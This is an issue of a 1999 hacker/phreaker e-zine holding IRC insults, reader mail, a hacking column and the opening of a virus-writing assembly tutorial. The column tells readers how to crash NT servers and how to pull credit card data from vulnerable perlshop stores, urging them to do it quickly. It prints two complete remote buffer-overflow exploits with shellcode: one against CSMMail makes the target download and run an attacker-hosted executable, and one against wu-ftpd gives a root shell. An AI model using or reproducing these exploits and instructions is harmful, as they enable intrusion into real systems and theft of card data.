f41th Issue 05
yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|
[f41th Issue 5 June 1999] [c] D4RKCYDE 1999
[darkcyde.system7.org] [#darkcyde EFNET]
'f41th, chOice of the real phreak'
'f41th - Die Wahl des wahren Phreak'
'find us on the PSTN bitch'
'Zu finden auf dem PSTN bitch'
--> Index ]----oooo-------------------------------oooo----[ f41th 5! ]------
-->]OO[::::[ Editorial ]:::::::[OO--[ hybrid ]---
-->]OO[::::[ Letters to f41th ]:::::::[OO--[ you ]---
-->]OO[::::[ SUIDcyde ]:::::::[OO--[ bodie ]---
-->]OO[::::[ Assembly coding and virii ]:::::::[OO--[ bodie ]---
-->]OO[::::[ SS7 network components ]:::::::[OO--[ digiphreq ]---
-->]OO[::::[ Electronic data ]:::::::[OO--[ zomba ]---
-->]OO[::::[ Linux system security ]:::::::[OO--[ zomba ]---
-->]OO[::::[ Zombas bonus phone warez ]:::::::[OO--[ zomba ]---
-->]OO[::::[ Scan of O8OO 252 ]:::::::[OO--[ shadow ]---
-->]OO[::::[ IRC logz ]:::::::[OO--[ #darkcyde ]---
-->]OO[::::[ Wireless E-911 Service ]:::::::[OO--[ digiphreq ]---
-->]OO[::::[ Introduction to carding ]:::::::[OO--[ Kryptus ]---
-->]OO[::::[ Political views ]:::::::[OO--[ nino ]---
-->]OO[::::[ Outness ]:::::::[OO--[ hybrid ]---
[ random quotes from tonekilla - he wonders why he's not in ]
[ darkcyde anymore - a) lame b) idle c) pisses me off on irc. ]
<tonekilla> its like: | suck hybrid's cock for ops | <-- yEp
<tonekilla> motherfuckers stop <-- nope
<tonekilla> NINO IS MY FUCKING BRO <-- heh?
<tonekilla> dont tell me to relax <-- why?
<tonekilla> i dont give a fuck <-- we know
<tonekilla> well FUCK YOU <-- ok
<tonekilla> FUCK YOU <-- OK
<tonekilla> FUCK YOU HYBRID <-- no
<tonekilla> what the fuck is your problem?
<tonekilla> you didnt get banned for no fucking reason from a
channel you properly ran for 3 months then someone
comes in, kicks and bans you and fucking turns it
into a dynasty
*** DTMFslut sets mode: +b *!*tonekilla@*.tecinfo.com
*** tonekilla was kicked by DTMFslut
(banned: learn some manners bitch) <---- well said
----[ shoutz [ special shouts to kryptis (we'll miss ya bro) ]----------
----------------[ simmeth digitalfokus mobsters bosplaya osiris ]----------
----------------[ * WERD WERD WERD WERD WERD WERD WERD WERD WERD ]----------
----------------[ shadowx ch1ckie subz gr1p ph1x tip gb shylock ]----------
----------------[ prez_ jasun xio psyclone knight oclet nino dave ]----------
----------------[ b4b0 9x phunc deadsoul aktive sonicborg asshair ]----------
----[ memberz
----------------[ hybrid downtime force zomba bodie digiphreq elf ]----------
----------------[ mortis alphagod lowtek | new member: shadowx ]----------
| new member: postalphreak
| new member: nino
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Editorial ]:::::::[OO--[ by hybrid ]------[ hybrid@phunc.com ]--
-->[OO]:::::::::::::::::::::::::::::[ http://www.phunc.com/~hybrid ]:::::::::
Hi there, yep, we made it to another issue, this time it's even better :> We
got bodie's new column [SUIDCYDE] and even more leet info. It's now spring,
so we've decided to do a spring clean of darkcyde.. for starters all the
idle people, ie: tonekilla, have been kicked out, and we've decided to
improve the quality of the zine, cutting down on the codez, and increasing the
info. I'm not writing anything for this issue 'cause I've done enough already,
I'm the one who has to put all this stuff together, and keep it all organised,
etc. I'd like to say one thing to the dudes in #darkcyde efnet, that are
bitching about shit.. It's irc, nothing more. HEH, take a look at the logs
our bot (DTMFslut) recorded of the channel - at the end of this issue. Welp,
there's my leeto editorial done, now I gotta stick this stuff into 14-inch
screen format, doesn't ms-dos edit 0wn? -cya on irc #darkcyde.
hybrid
http://www.phunc.com/~hybrid <---- my site, check it out.
-->]OO[::::[ Mail ]:::::::[OO--[ you ]---------------------------------------
you have new mail
#pine
From bennygill@gmx.net Sun May 9 22:30:52 1999
Date: Sun, 9 May 1999 22:15:04 +0100
From: Ben J. Gill <bennygill@gmx.net>
To: hybrid@phunc.com
Subject: f41th ISSUE IIII
Hiya,
Don't want to be a smart ass, but I just read f41th ISSUE IIII and
noticed that you translated the heading into German.
I happen to be a German Phreak living in the UK (London) at the moment
and couldn't help but notice that the transl. isn't quite what it should
be. Here's my Version:
'f41th, chOice of the real phreak'
'f41th - Die Wahl des wahren Phreak'
'find us on the PSTN bitch'
'Zu finden auf dem PSTN bitch'
I dunno what a PSTN bitch is, but "bitch" is not a "Weibchen" in German,
bitch = "Nutte, Hure"
Hope I wasn't too much of a smart ass, but I just couldn't help it ;o)
Ben
http://bennygill.home.pages.de
ICQ : 10302953
mail :
Phrenetic@gmx.net ( H/P mails )
bennygill@gmx.net ( Personal mails )
funkymonkey@geek.com ( Tech / News Mails )
---------[ Thanks for the interest in our/my bad German skillz.
---------[ HEH, look I spelt it correctly this time... :)
---------[ #screen -r
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ SUIDcyde ]:::::::[OO--[ by Bodie ]----------[ bodi3@usa.net ]---
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Welcome to the new regular hacking section in faith, this section is devoted
to the latest news, techniques and exploits in hacking. Enjoy.
----------
Bugtraq watch
As a regular column now in faith I'll be telling everyone what is going on in
the world's greatest mailing list - bugtraq, it's where all the latest
exploits get posted to and it's the best list for security.
Recently there have been several bugs reported. Possibly the most severe one
was a report of being able to remotely reboot an NT machine. This is how to
do it:
find an NT box running SP4 (service pack 4)
Telnet to port 1723
type 256 'h' characters and hit return
Press ^D
This hopefully should cause the machine to completely reboot and cause
microshaft a few more headaches which is always good news for our favorite
linux servers :). This bug hasn't been confirmed yet and some people haven't
been able to get it to work, but give it a go anyway
Possibly the most serious flaw uncovered recently was an exploit in some
online shopping services, some of these are run on a software package called
perlshop. With this you can get peoples credit card info which is always
nice :)
For this one all you have to do is find a site running the software (it may
tell you that it is on the web page) and go to the directory:
www.vulnerable.com/store/customers/
or it may be in:
www.vulnerable.com/store/temp_customers/
This bug is likely to be fixed extremely quickly so if ya wanna exploit it,
ya better hurry up :)
Buffer overflows have also been reported in the Windows CSMMail SMTP
server. Time for some exploit code:
<--------------------------CUT HERE------------------------->
#define UNIX
#ifndef UNIX
#include <stdio.h>
#include <fcntl.h>
#include <winsock.h>
#include <io.h>
#define CLOSE _close
#define SLEEP Sleep
#else
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define CLOSE close
#define SLEEP sleep
#endif
/*
CSMMail Exploit by _mcp_ <pw@nacs.net>
Win32 port and sp3 address's by Acpizer <acpizer@unseen.org>
Greets go out to the following people: Morpheus, Sizban, Rocket,
Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite
and #win32asm.
You can contact me by e-mail or on efnet.
As always no greets go out to etl
*/
const unsigned long FIXUP1 = 264;
const unsigned long FIXUP2 = 268;
const unsigned long OFFSET = 260;
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB"
"\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3"
"\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";
/*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";
unsigned int getip(char *hostname)
{
struct hostent *hostinfo;
unsigned int binip;
hostinfo = gethostbyname(hostname);
if(!hostinfo)
{
printf("cant find: %s\n",hostname);
exit(0);
}
#ifndef UNIX
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
#endif
return(binip);
}
int usages(char *fname)
{
printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ <pw@nacs.net>.\n");
printf("Win32 porting and nt sp3 address's by Acpizer <acpizer@unseen.org>\n");
printf("Usages: \n");
printf("%s <target host> <www site> <fixup address> <return address>\n", fname);
printf("win98 SP1:\n");
printf(" <fixup address> = 0xBFF78030\n");
printf(" <return address> = 0xBFF79243\n");
printf("NT SP3:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E53FC7\n");
printf("NT SP4:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E9A3A4\n");
printf("Will make <target host> running CSMMail download, save, and\n");
printf("execute http://<www site>/~pw/owned.exe\n");
exit(0);
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 5) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0)
{
printf("Input Error, the fixup memory address has incorrect format\n");
exit(0);
}
if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=FIXUP1;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr2=ptr;
ptr2+=FIXUP2;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr+=OFFSET;
memcpy ((void *) ptr,(void *)&ret_addr, 4);
ptr+=60;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) - 1 );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, "HELO lamer.com\r\n",16, 0);
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, "HELO lamer.com\r\n",16);
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char*)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
CLOSE(sock);
exit(1);
}
<--------------------------CUT HERE------------------------->
Also there has been another buffer overflow found in wu-ftpd, a popular ftp
daemon for unix servers. This only exists in beta versions 12 - 18, and
these aren't the current version, so don't be surprised if you find that not
too many servers are running it.
<--------------------------CUT HERE------------------------->
/*
* Remote/local exploit for wu-ftpd [12] through [18]
* gcc w00f.c -o w00f -Wall -O2
*
* Offsets/padding may need to be changed, depending on remote daemon
* compilation options. Try offsets -5000 to 5000 in increments of 100.
*
* Note: you need to use -t >0 for -any- version lower than 18.
* Coded by smiler and cossack
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
"\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
"\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48";
unsigned char hellcode_b[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);
struct type {
unsigned long ret_address;
unsigned char align; /* Use this only to offset \xff's used */
signed short pad_shift; /* how little/much padding */
unsigned char overflow_type; /* whether you have to DELE */
char *name;
};
/* ret_pos is the same for all types of overflows, you only have to change
the padding. This makes it neater, and gives the shellcode plenty of
room for nops etc
*/
#define RET_POS 190
#define FTPROOT "/home/ftp"
/* the redhat 5.0 exploit doesn't work at the moment...it must be some
trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
{ 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", },
{ 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", },
{ 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", },
{ 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", },
{ 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", },
{ 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", },
{ 0,0,0,0,NULL }
};
struct options {
char start_dir[20];
unsigned char *shellcode;
unsigned char chroot;
char username[10];
char password[10];
int offset;
int t;
} opts;
/* Bit of a big messy function, but hey, its only an exploit */
int main(int argc,char **argv)
{
char *argv0,ltr;
char outbuf[1024], inbuf[1024], ret_string[5];
int pwdlen,ctr,d;
FILE *cin;
int fd;
struct in_addr victim;
argv0 = strdup(argv[0]);
*opts.username = *opts.password = *opts.start_dir = 0;
opts.chroot = opts.offset = opts.t = 0;
opts.shellcode = hellcode_a;
while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
switch (d) {
case 'c':
opts.shellcode = hellcode_b;
opts.chroot = 1;
break;
case 's':
strcpy(opts.start_dir,optarg);
break;
case 'o':
opts.offset = atoi(optarg);
break;
case 't':
opts.t = atoi(optarg);
if ((opts.t < 0)||(opts.t>5)) {
printf("Dont have that type!\n");
exit(-1);
}
}
}
argc -= optind;
argv += optind;
if (argc < 3)
usage(argv0);
if (!resolv(argv[0],&victim)) {
perror("resolving");
exit(-1);
}
strcpy(opts.username,argv[1]);
strcpy(opts.password,argv[2]);
if ((fd = tcp_connect(victim,21)) < 0) {
perror("connect");
exit(-1);
}
if (!(cin = fdopen(fd,"r"))) {
printf("Couldn't get stream\n");
exit(-1);
}
Fgets(inbuf,sizeof(inbuf),cin);
printf("%s",inbuf);
if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
fatal("Bad username\n");
if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
fatal("Bad password\n");
if (*opts.start_dir)
if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
fatal("Couldn't change dir\n");
if (ftp_command(inbuf,257,cin,"PWD\n")<0)
fatal("PWD\n");
if (parse_pwd(inbuf,&pwdlen) < 0)
fatal("PWD\n");
srand(time(NULL));
printf("Making padding directorys\n");
for (ctr = 0;ctr < 4;ctr++) {
ltr = rand()%26 + 65;
memset(outbuf,ltr,194);
outbuf[194]=0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
}
/* Make padding directory */
ctr = 124 - (pwdlen - types[opts.t].align);//180
//ctr = 152 - (pwdlen - types[opts.t].align);
ctr -= types[opts.t].pad_shift;
if (ctr < 0) {
exit(-1);
}
memset(outbuf,'A',ctr+1);
outbuf[ctr] = 0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
memset(outbuf,0x90,195);
d=0;
for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
outbuf[ctr] = opts.shellcode[d++];
double_up(types[opts.t].ret_address-opts.offset,ret_string);
strcpy(outbuf+RET_POS,ret_string);
strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
printf("Press any key to send shellcode...\n");
getchar();
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (types[opts.t].overflow_type == 1)
if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
fatal("DELE\n");
/* HEH. For type 1 style we add a dele command. This overflow
occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
not checking bounds correctly, overwriting path[] in delete(). */
RunShell(fd);
return(1);
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
return;
}
int double_up(unsigned long blah, char *doh)
{
int a;
unsigned char *ptr,*ptr2;
bzero(doh,6);
ptr=doh;
ptr2=(char *)&blah;
for (a=0;a<4;a++) {
*ptr++=*ptr2;
if (*ptr2==0xff) *ptr++=0xff;
ptr2++;
}
return(1);
}
int parse_pwd(char *in, int *pwdlen)
{
char *ptr1,*ptr2;
/* 257 "/" is current directory */
ptr1 = strchr(in,'\"');
if (!ptr1) return(-1);
ptr2 = strchr(ptr1+1,'\"');
if (!ptr2) return(-1);
*ptr2 = 0;
*pwdlen = strlen(ptr1+1);
/* If its just "/" then it contributes nothing to the RET_POS */
if (*pwdlen==1) *pwdlen -= 1;
printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
return(1);
}
int tcp_connect(struct in_addr host,unsigned short port)
{
struct sockaddr_in serv;
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
serv.sin_port = htons(port);
serv.sin_family = AF_INET;
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
return(-1);
}
return(fd);
}
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
va_list va;
char line[1200];
int val;
va_start(va,fmt);
vsprintf(line,fmt,va);
va_end(va);
if (write(fileno(out),line,strlen(line)) < 0)
return(-1);
bzero(buf,200);
while(1) {
Fgets(line,sizeof(line),out);
#ifdef DEBUG
printf("%s",line);
#endif
if (*(line+3)!='-') break;
}
strncpy(buf,line,200);
val = atoi(line);
if (success != val) return(-1);
return(1);
}
void fatal(char *string)
{
printf("%s",string);
exit(-1);
}
char *Fgets(char *s,int size,FILE *stream)
{
char *ptr;
ptr = fgets(s,size,stream);
//if (!ptr)
//fatal("Disconnected\n");
return(ptr);
}
int resolv(char *hostname,struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hostname,addr))
return(1);
res = gethostbyname(hostname);
if (res == NULL)
return(0);
memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
return(1);
}
int usage(char *program)
{
fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
fprintf(stderr,"\t[-o offset] [-t type]\n");
fprintf(stderr,"types:\n");
fprintf(stderr,"0 - %s\n", types[0].name);
fprintf(stderr,"1 - %s\n", types[1].name);
fprintf(stderr,"2 - %s\n", types[2].name);
fprintf(stderr,"3 - %s\n", types[3].name);
fprintf(stderr,"4 - %s\n", types[4].name);
fprintf(stderr,"5 - %s\n", types[5].name);
fprintf(stderr,"\n");
exit(0);
}
<--------------------------CUT HERE------------------------->
That's about all for the moment. If you want to subscribe to bugtraq
yourself, send a mail to bugtraq@netspace.org with the text subscribe bugtraq
<your e-mail> in the body of the message.
Bodie
----------
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::::[ Assembly language programming and virii ]:::::[OO--[ by Bodie ]--
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Part 1
A lot of people think that writing virii is a hard thing to do, the truth
is, it's relatively easy, but it does take a bit of assembly language
knowledge. In this file I will show ya a little assembly programming and how
to make a simple virus (so all you script kiddies out there can also create
something like melissa - the kewlest piece of programming on the face of the
planet :)) But learning assembly language doesn't have to be a completely
impossible task, although it probably is a little harder than learning your
average C clone. To understand this you will need a basic knowledge of binary
numbers. This isn't hard really. One person once said to me, "languages are
like druggies, the higher they are, the easier they are to get on with, but
the less use they are to you :)"
Assembly language is more than that though, it gets to the centre of the
hacker mentality, it allows you to screw with the exact working of the
computer, some say you can't be a hacker unless you know assembly language, I
disagree but hacking is about making a computer do something it isn't
supposed to do, and how can ya do that unless you know exactly how things are
working inside the computer?
BASICS
Assembly language programming is different depending on which processor you
have, but I know the Intel chips best, so I will write this for those chips,
for other chips the instructions may be totally different.
REGISTERS
To learn assembly language you need a basic understanding of the design of
the chip that you're writing for. An Intel chip is made up of things called
registers. These are places in a chip where a number can be stored and
manipulated. There are four types of registers, general purpose registers,
index registers, segment registers and stack registers. The first type is
the general purpose registers. There are 4 general purpose registers, EAX,
EBX, ECX and EDX. These are 32-bit registers. These registers can be split
up into smaller 16-bit registers called AX, BX, CX and DX, and these can be
further split into 8-bit registers called [A-D]H and [A-D]L. They are
arranged roughly like this.
      <------------E[A-D]X------------>
      _________________________________
     |        |        |               |
     | [A-D]L | [A-D]H |               |
     |________|________|_______________|
      <----[A-D]X----->
The next type of register is called a Stack Register. There are 2 stack
registers, called BP and SP, as you might have guessed, these are used mainly
on the stack. SP is the stack pointer, it tells you where the next item on
the stack is placed, but more on that later.
Index Registers are used to hold data on the current program running. IP is
the most important of these, as it tells the computer where the next
instruction to be executed is located. You can't directly manipulate it
(that means you can't put a number directly into it - although there are
other ways of having fun with it :)) Other index registers are
EDI (destination index) and ESI (source index). Again these can be split into
SI and DI, but unlike general purpose registers, they can't be split any
further.
Segment and offset registers are responsible for accessing memory locations.
This is a system that has been left over for compatibility with older 16-bit
chips, because in a 16-bit register, you could only access 32K memory
locations, the chip designers devised a way to use 2 registers to access a
memory location, this allows you to access enough memory for almost anyone.
The segment is the lower half of the location and it can be held in any
segment register. These are CS, DS, ES, SS, FS and GS. The offset can be
held in any general purpose register.
THE STACK
Another place to store data is on the stack. Like the name suggests, this is
just an area where the data is piled when you need to clear a register for
something else, but still need the data to be retrieved later. The stack
works on a 'last in, first out' (LIFO) principle. This means that the last
item of data to be put on to the stack is the first to come off, when you
take data from the stack. When you put an item of data on to the stack it
goes on the highest memory location available in the stack, and then the
stack pointer (SP) is set to point to the last item put onto the stack. This
is so that the computer knows where the last item is located. The stack is
arranged like this.
 ___________
|           |
|           |
| data (1)  |
|___________|
|           |
|           |
| data (2)  |
|___________| <--------Stack Pointer (SP)
|           |
|           |
|           |
|   Free    |
|   Space   |
|           |
|           |
|___________| <--------Stack Segment (SS)
In this example, data 2 would be the first to be returned when a process is
accessing the stack, this is because data 2 was the last item to be put on
the stack. If another item was to be put on the stack it would be put into
the free space area and the stack pointer would be moved to represent this.
This would then be the first item to be returned.
VARIABLES
Variables are easily defined in assembly language, just like any other
language. The way to do it is
[variable_name] [type] [value]
a common usage of this would be:
hello db "hello!!!$" ; sets a variable of type db to "hello!!!$"
all strings in assembly language have to be terminated with a $ symbol. The
variable type we are using is db, this is the common type for strings like
this, there are other variable types, I will tell you these later.
SOME INSTRUCTIONS
The structure of an assembly language program is very different from the
structure of a program in a higher level language. It consists of a series
of 1 line instructions. Some instructions are:
MOV [destination], [source]
The destination has to be a register, but the source can be either an
immediate value or the contents of another register.
mov ax, 10 ; moves the value 10 into the register ax
mov bx, cx ; moves the value of the register cx into bx
the ; represents the end of an instruction. anything after this is a comment
PUSH [data]
Puts data onto the stack
POP [register or variable]
puts the first value on the stack into the register or variable
push ax ; puts the value of ax onto the stack
push bx ; puts the value of bx onto the stack
pop ax ; puts the first value on the stack into ax
pop bx ; puts the next value on the stack into bx
This program would swap the values of registers ax and bx.
INT [number]
this is a command which calls an interrupt from either DOS or the BIOS. This
allows you to do things like write to the screen or opening a file or
something. There may be several subroutines that can be called from each
interrupt number. These are distinguished between by using the register ah.
mov ah, 9 ; this tells the int command to call subroutine 9 from the interrupt
int 21h ; this calls interrupt 21h, which is the standard DOS interrupt
In this program subroutine 9 tells the system to print something to the
screen. More on this later.
From this we can write our first program.
-------------------cut here--------------------
        org 100h                ; .COM program: code is loaded at offset 100h
start:
        jmp begin               ; skip over the data so it is never executed as code
printed db "hello fucker$"      ; creates the variable 'printed'
begin:
        mov dx, OFFSET printed  ; sets dx to the offset of the variable 'printed'
        mov ax, SEG printed     ; sets ax to the segment of the variable 'printed'
        mov ds, ax              ; moves ax (containing the segment) to ds - because
                                ; ds is the main segment register this now means that
                                ; ds:dx is pointing to the variable 'printed'
        mov ah, 9               ; subroutine 9 of int 21h: print a $-terminated string
        int 21h                 ; this prints our message to the screen
